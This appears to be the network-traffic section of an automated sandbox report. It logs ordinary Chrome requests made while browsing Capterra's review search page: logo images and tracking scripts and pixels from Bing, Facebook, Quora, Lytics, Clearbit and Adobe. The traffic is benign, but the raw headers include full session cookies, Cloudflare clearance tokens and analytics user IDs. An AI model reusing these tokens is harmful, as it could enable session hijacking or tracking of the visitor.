        Source: global trafficHTTP traffic detected: GET /ProductLogo/670d76a5-76f8-4742-a6f9-a42d167cc69d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/7780d136-e630-42e5-adce-8f580dc09687.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/27a50d30-49b3-4fb0-902d-34d05a775b15.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fsrelay/rec/integrations?OrgId=18VAT4&isInFrame=false&isNative=false HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034627.40.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /ProductLogo/713f882b-f7a1-4f3f-a484-7af2fe13f5c3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/08d2adc0-b055-41c3-9caa-981ebab6ae4e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/35e9db05-94a1-4859-b307-858b9d3946cb.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/144001e9-6c0c-4474-b435-649533e0c317.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fsrelay/rec/bundle/v2?OrgId=18VAT4&UserId=da9f39f7-d4a4-45f4-948f-86299cb47816&SessionId=084a7745-8adb-4b14-adf2-26e4e4ddbd6e&PageId=e2e5b10c-4bbc-4510-b497-529b569fdc46&Seq=2&ClientTime=1725034630155&PageStart=1725034624939&PrevBundleTime=1725034629801&LastActivity=2305&IsNewSession=true&ContentEncoding=gzip HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034627.40.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /ProductLogo/670d76a5-76f8-4742-a6f9-a42d167cc69d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/7780d136-e630-42e5-adce-8f580dc09687.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /v1/companies/reveal?authorization=pk_4e234eeab65b11414ee6da2ca87259ad&callback=clearbitCallback HTTP/1.1Host: reveal.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
        Source: global trafficHTTP traffic detected: GET /ProductLogo/144001e9-6c0c-4474-b435-649533e0c317.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fsrelay/rec/integrations?OrgId=18VAT4&isInFrame=false&isNative=false HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034627.40.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /static/javascripts/ecid.js HTTP/1.1Host: cdn0.capterra-static.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /v1/companies/reveal?authorization=pk_4e234eeab65b11414ee6da2ca87259ad&callback=clearbitCallback HTTP/1.1Host: reveal.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
        Source: global trafficHTTP traffic detected: GET /api/tag/7dafa3f5f9e8efd6782940aa05719f12/latest.min.js HTTP/1.1Host: c.lytics.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /p/action/5067725.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
        Source: global trafficHTTP traffic detected: GET /fsrelay/datalayer/v4/latest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034632.35.0.0
        Source: global trafficHTTP traffic detected: GET /_/ad/f3ffe7daf89b419a979311e77be0152b/pixel?tag=ViewContent&i=gtm&u=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F HTTP/1.1Host: q.quora.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=5.1.1&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=04D07E1C5E4DDABB0A495ED1%40AdobeOrg&d_nsid=0&ts=1725034633424 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://reviews.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /static/javascripts/ecid.js HTTP/1.1Host: cdn0.capterra-static.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /api/tag/7dafa3f5f9e8efd6782940aa05719f12/latest.min.js HTTP/1.1Host: c.lytics.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_/ad/f3ffe7daf89b419a979311e77be0152b/pixel?tag=ViewContent&i=gtm&u=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F HTTP/1.1Host: q.quora.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /p/action/5067725.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
        Source: global trafficHTTP traffic detected: GET /cid/7dafa3f5f9e8efd6782940aa05719f12?assign=false&callback=u_294798340052452740 HTTP/1.1Host: c.lytics.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /action/0?ti=5067725&tm=gtm002&Ver=2&mid=6d19bebc-5768-4167-965a-53cee4239878&sid=5154566066eb11ef9610b7a0af03a19e&vid=5154816066eb11efb250d7a43de017cc&vids=1&msclkid=N&uach=pv%3D10.0.0&pi=918639831&lg=en-US&sw=1280&sh=1024&sc=24&tl=Capterra%20%7C%20Review%20Software&p=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&r=https%3A%2F%2Fwww.capterra.com%2F&lt=7712&evt=pageLoad&sv=1&asc=G&cdb=AQED&rn=49435 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: 